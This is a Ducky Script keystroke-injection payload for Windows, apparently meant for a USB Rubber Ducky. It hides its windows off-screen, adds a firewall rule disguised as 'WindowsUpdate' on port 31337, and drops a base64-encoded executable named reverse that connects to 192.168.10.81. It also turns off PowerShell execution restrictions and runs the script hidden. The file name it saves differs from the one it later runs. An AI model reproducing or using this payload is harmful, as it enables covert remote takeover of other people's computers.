Code:
DELAY 1550
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING netsh advfirewall firewall add rule name='WindowsUpdate' dir=in action=allow protocol=TCP localport=31337
ENTER
DELAY 500
STRING $decoder = 'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub'
ENTER
STRING $reverse = 'TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAAAADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAAAAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0AAHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hAWXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAAMAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNqkQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwFEVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtvKhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLpAOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNmMgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/AVXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7shwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzpbMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOYLmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B/7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBkSNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2Vsm0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAxAAADpdL7//wAAAAIAAAAMQAAA'
ENTER
STRING Set-Content -Value $decoder -Path C:\decoder.vbs
ENTER
STRING Set-Content -Value $reverse -Path C:\reverse.txt
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe 192.168.10.81 31337
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 750
STRING C:\Windows\config-866cc.ps1
ENTER
DELAY 750
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER